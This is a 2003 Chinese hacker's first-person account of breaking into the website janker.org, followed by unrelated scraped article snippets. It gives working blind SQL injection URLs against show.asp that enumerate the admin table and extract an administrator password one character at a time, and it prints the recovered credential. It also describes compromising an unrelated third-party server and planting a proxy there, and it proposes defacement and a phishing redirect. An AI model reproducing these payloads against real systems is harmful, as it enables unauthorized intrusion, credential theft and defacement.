我是这样渗透入侵孤独剑客网站(janker.org)的

我是这样渗透入侵孤独剑客网站(janker.org)的
作者:N.E.V.E.R
日期:2003年5月22日
出自http://www.janker.org

不成功的入侵还是有点借鉴价值的,我想同样的方法换一个地方的话,说不定就成功了。
目的地www.janker.org,呵呵,应该算是授权了的吧。传说中的黑客叔叔们都是先踩点的,
如果我有条件的话,一定先到机房附近去看看,兴许还能捡到点密码什么的。不过实在太远,买车

票过去的时间说不定我都可以打一把Windforce了,还是来点远程的吧。
拿出扫描器甲乙丙丁一阵乱扫,呵呵,结果大家都能猜到,就不废话了。反正80和23是开着的

,这个结果要记住。
系统漏洞没有的话,有几种方法可以供选择:1、渗透;2、脚本漏洞。当然,还可以玩

D.D.o.S,还可以背上炸药包炸主机,还可以用拖网把电缆弄断,还可以开飞机把那栋楼撞了,等

等。当然这些要看攻击者的想象力,我还是老老实实的看脚本。
找啊找啊,找了几秒钟,找到一个地方没有很好的处理参数id。
http://www.janker.org/show.asp?id=2;--
出错了。“Microsoft JET Database Engine 错误 "80040e14" 在 SQL 语句结尾之后找到字

符。”嗯,大虾们肯定已经看出来了吧?我想来想去觉得这句话告诉了两件事情:一、用的是

ACCESS数据库;二、脚本里面兴许有什么" where id=" & request("id")之类的没有过滤的洞洞。

关键是怎么用呢?
我还是决定像瞎子摸象一样再看看,猜了一会儿后,觉得一个发布系统远程总会有一个管理系

统吧,猜猜表名看看。
http://www.janker.org/show.asp?id=2 or id in (select id from admin)
OK,没有报错,那么说起来存在一个admin的表,而且这张表里面有id项,其实后来想想这样

不好,子查询只是要确定一下有没有admin这张表,用..... id <> (select count(*) from

admin)比较好。
继续猜,猜了几个常见的列名,嗯,得到的结果是有user,password。到这里的时候,我觉得

我走了很多弯路,虽然第一直觉是这是一个免费的公开源代码的东东,但是因为一下子我没有认出

来是什么(我看过的东西很少啊,呵呵……),就没有去找下载,现在猜得头晕,觉得还是应该去

找代码来看比较好。
于是我的方向又转到如何去找相同的东东。呵呵,很笨的,我想到了在google.coms搜索

fir.asp,因为fir.asp是很奇怪的一个名字,结果我找到了很多很多相同的站点。我觉得几千个结

果里面总有非常容易入侵的机器吧,嗯,我用的是webdavx3,大约失败60次以后,终于找了一个进

去。当然啦,我只是要看看代码,没有别的意思,只是在这台机器上装了socks5代理(呵呵),补

上漏洞就出来了。
这个时候已经临近熄灯时间,我就干脆断了网看代码,嗯,应该说是看那个Access数据库。早

这样的话,我就会少走好多弯路啊,不过猜猜也很有意思,大脑长期不用会生锈的。
有人想到直接下数据库吧?呵呵,哪有这么容易的事情啊,数据库的名字百分之一百二被改掉

了。
嗯,反正我已经知道admin表是怎样的了,猜猜密码也还不算是太累的工作。先看看admin里面

有几个管理员。
http://www.janker.org/show.asp?id=3 AND 1<(select count(*) from admin)
嗯,比一个多……
http://www.janker.org/show.asp?id=3 AND 10<(select count(*) from admin)
没有十个……
(省略无聊过程若干)
http://www.janker.org/show.asp?id=3 AND 5=(select count(*) from admin)
有五个管理员呢,随便找一个破一下啊……
我选的是id=1的,我先猜的是它的密码第一位,呵呵,密码总要一位一位的猜嘛……
http://www.janker.org/show.asp?id=3 and 1=(select id from admin where left

(password,1)="q")
嗯,显示是“未指定所需参数!”那么第一位不是q了,如果我们提交的SQL查询正确执行——也就

是我们猜对了的话,是会出来id=3的那篇文章的(前面的那些也一样)。继续来吧……
w、e、r、t、y……猜了一会儿,结果出来了。
http://www.janker.org/show.asp?id=3 and 1=(select id from admin where left

(password,1)="j")
显示了id为3的那篇文章,密码第一位为j。
暂停一下,如果密码有个2、30位的话,岂不是要猜死了,先看看密码有几位再说吧。方法和

猜管理员的个数是一样的,直接给出结果
http://www.janker.org/show.asp?id=3 and 1=(select id from admin where len(password)=7

and id=1)
7位,刚好在我的心理承受范围之内,8位以上的话就要考虑写程序猜了。猜测的过程是美好的

,你看到第一位是j后会怎样想呢,优先猜的肯定是a、A、4、@、k之类的吧?如果你猜到了前面三

位是jk2,后面的00也会很自信的写上去吧?最后的密码是jk2008!,呵呵,如果你在30分钟内没有

一位一位的猜出来的话,就不要做hacker/cracker了。还是给出过程:
http://www.janker.org/show.asp?id=3 and 1=(select id from admin where left

(password,2)="jk")

http://www.janker.org/show.asp?id=3 and 1=(select id from admin where left

(password,3)="jk2")

http://www.janker.org/show.asp?id=3 and 1=(select id from admin where left

(password,4)="jk20")

http://www.janker.org/show.asp?id=3 and 1=(select id from admin where left

(password,5)="jk200")

http://www.janker.org/show.asp?id=3 and 1=(select id from admin where left

(password,6)="jk2008")

http://www.janker.org/show.asp?id=3 and 1=(select id from admin where left

(password,7)="jk2008!")
嗯,大家在考场上有没有掷色子做选择题的经历啊?一般都是扔两次吧,呵呵,验算一下也是

很必要的哦。顺便把用户名也猜出来了……
http://www.janker.org/show.asp?id=3 and 1=(select id from admin where

password="jk2008!" and name="janker")
经过一番捣鼓,我终于得到了一个用户名/密码,嗯,很费工夫吧?费工夫的还在后面呢,还

有四个用户可是等着我们猜的。当然,全部得到我想要的东西时,已经是第二天的事情了,至于用

户名密码,我就不说了,我只是说过程嘛……
然后干什么就是定式了吧?我选择的道路是先进入管理界面发布两条搞笑的消息,然后说不定

有什么跨站脚本漏洞,新闻是显示在首页上的,没有过滤html字符的情况下,你可以想办法建一个

1600x1200的div,背景色设定为黑,真正把它“黑”掉。或者刷新到你自己伪造的页面上,等待那

些习惯从首页登陆的同志们的密码

时间: 2024-08-03 17:03:05

我是这样渗透入侵孤独剑客网站(janker.org)的的相关文章

15年没有被黑客入侵,这个网站很安全吗?

本文讲的是15年没有被黑客入侵,这个网站很安全吗?, Mozilla 两周前发布了 Firefox 52,引入了在 HTTP 登录页面显示不安全警告图标的新功能.然而一个名为 www.oilandgasinternational.com 的 HTTP 网站随后向 Bugzilla 递交 bug  报告,称Firefox浏览器会警告他们该页面不适合传输密码. 一个名为Dgeorge的用户写到: 我并不想在登录自己网站时,会收到你的不安全登录通知,这一通知并没有经过我们允许.请立即移除这一功能.我们

黑客热衷入侵政府类网站:技术成本低收益高

黑客"偏爱"政府网站 济南市公安局成功侦破一起新型制售假证大案.犯罪分子采取黑客攻击手段,入侵国家级教育网站和多所高校网站,篡改数据后大肆制作和销售假学历.假证书. 新闻背景 今年12月中旬,两名仅有初中学历的90后,因非法侵入最高人民检察院反渎职侵权厅网站后台.非法控制长沙质量技术监督局等政府网站,涉嫌构成非法侵入计算机信息系统罪.非法控制计算机信息系统罪被公诉至北京市朝阳区法院. 然而,这绝不是个案.据国家互联网应急中心的监测报告显示,2010年5月10日至16日,仅一周内,中国境

我是新手第一次请教大家这个网站免费api数据接口怎么调用

问题描述 我是新手第一次请教大家这个网站免费api接口怎么调用由于公司需要快递物流数据接口.气象数据接口.公交查询怎么调用请教各位大神 解决方案 解决方案二:直接GET一个URL过去比如说<formaction="http://api.36wu.com/Weather/GetWeather?district=%E5%8C%97%E4%BA%AC"method="get"><inputtype="submit"value=&quo

入侵AT&amp;T网站黑客奥恩海默称自己无罪

中介交易 SEO诊断 淘宝客 云主机 技术大厅 曾入侵AT&T网站的黑客安德鲁·奥恩海默(Andrew Auernheimer)(新浪科技配图) 新浪科技讯 北京时间7月25日晚间消息,曾入侵AT&T网站的黑客安德鲁·奥恩海默(Andrew Auernheimer)上周在接受采访时表示,当年入侵AT&T网站只是想告诉iPad用户他们的信息处于危险之中,因此自己并无过错. 奥恩海默的命运目前尚未定论,但结果很可能是未来2年至15年要在监狱中度过.去年,奥恩海默和另一名黑客好友发现了A

济南破获伪造证书大案 黑客入侵国家级教育网站

中介交易 http://www.aliyun.com/zixun/aggregation/6858.html">SEO诊断 淘宝客 云主机 技术大厅 本报讯(记者 丛民)日前,济南市公安局成功侦破一起新型制售假证大案.犯罪分子采取黑客攻击手段,入侵国家级教育网站和多所高校网站,篡改数据后大肆制作和销售假学历.假证书. 由于在正规网站上能够查询到证书号,这些假证成为有备案的"真证书",因而更具有欺骗性. 据了解,济南市公安局今年3月接到公安部及山东省公安厅通报:国家级教育

5岁男孩平均每天成功入侵3家网站

国际在线专稿:据微软社交网站msnNOW4月18日报道,奥地利一名15岁男孩因在3个月内入侵259家公司的电脑系统而被逮捕,他平均每天成功入侵3家网站. 这名男孩已经向警方承认,在2012年1月到3月间,侵入259家公司网站,这些公司并不仅限于奥地利.他的攻击也没有具体目标,包括体育用品公司.旅游局.成人娱乐以及搜索引擎网站等.他称之所以这样做是因为感到无聊,并且想要证明自己. 这名男孩称从这些公司的网站和数据库中盗窃数据,然后将它们公布到网上.他还恶意羞辱许多公司的网站,并在微博客上自夸"成就

两黑客入侵最高检等网站后台 添加黑链

本报讯(记者王丽娜)范东东和文超入侵最高检等网站后台,更改网页源代码,添加黑链代码,为其他网站牟利.昨天上午,范东东.文超涉嫌非法侵入计算机信息系统罪和非法控制计算机信息系统罪在朝阳法院受审.检方指控,去年3月至5月间,范东东伙同文超用计算机上网,通过后门程序进入最高人民检察院反渎职侵权厅网站后台,更改网页源代码,添加黑链代码,为其他网站提升搜索排名率,达到牟利的目的.两人还先后入侵抚顺政务公开网.邹平党建网等十多个政府和企业网站.庭审中,范东东说,他曾学习过网站编程的知识,又看到添加黑链代码的

从常见的网站入侵流程反思网站的安全配置

中介交易 http://www.aliyun.com/zixun/aggregation/6858.html">SEO诊断 淘宝客 云主机 技术大厅 所谓知彼知己方能百战不殆,对于站长而言,要知道如何入侵网站,才会在网站安全上有更深的认识,才不容易给别人可乘之机;很多时候,很多网站入侵本身是可以避免的,只是因为站长疏忽大意,才会有这样的损失.如果能够很好地完成网站安全配置,那么你的网站在98%的情况下是安全的,这么高的安全性对普通网站而言已经足矣. 目前常见的网站入侵方式有程序漏洞.爆破.

我是如何将BB霜排行榜网站排名做到百度首页的

导语:每天在A5里逛,也没有什么时间写文章,今天借着这个夜晚,也写点自己做网站2年来的心得和经验吧.首先和大家介绍下我是一名辛苦的站长,做网站每天基本上是从早8点上忙到晚上12点,我做的网站有2个,一个是BB霜网站,另外一个网站是减肥药的网站,我的网站给我带来的盈利还不错,一个月差不多有1千左右的收入.目前而言,还是觉得可以吧. 有句话说的很好,纸上谈兵是没有用的,什么事都要经历过才知道,做网站排名也是,我以前做的网站有个是做关键字网赚这个词语的,我做了这个站也有一年时间.刚开始做站时候连HTM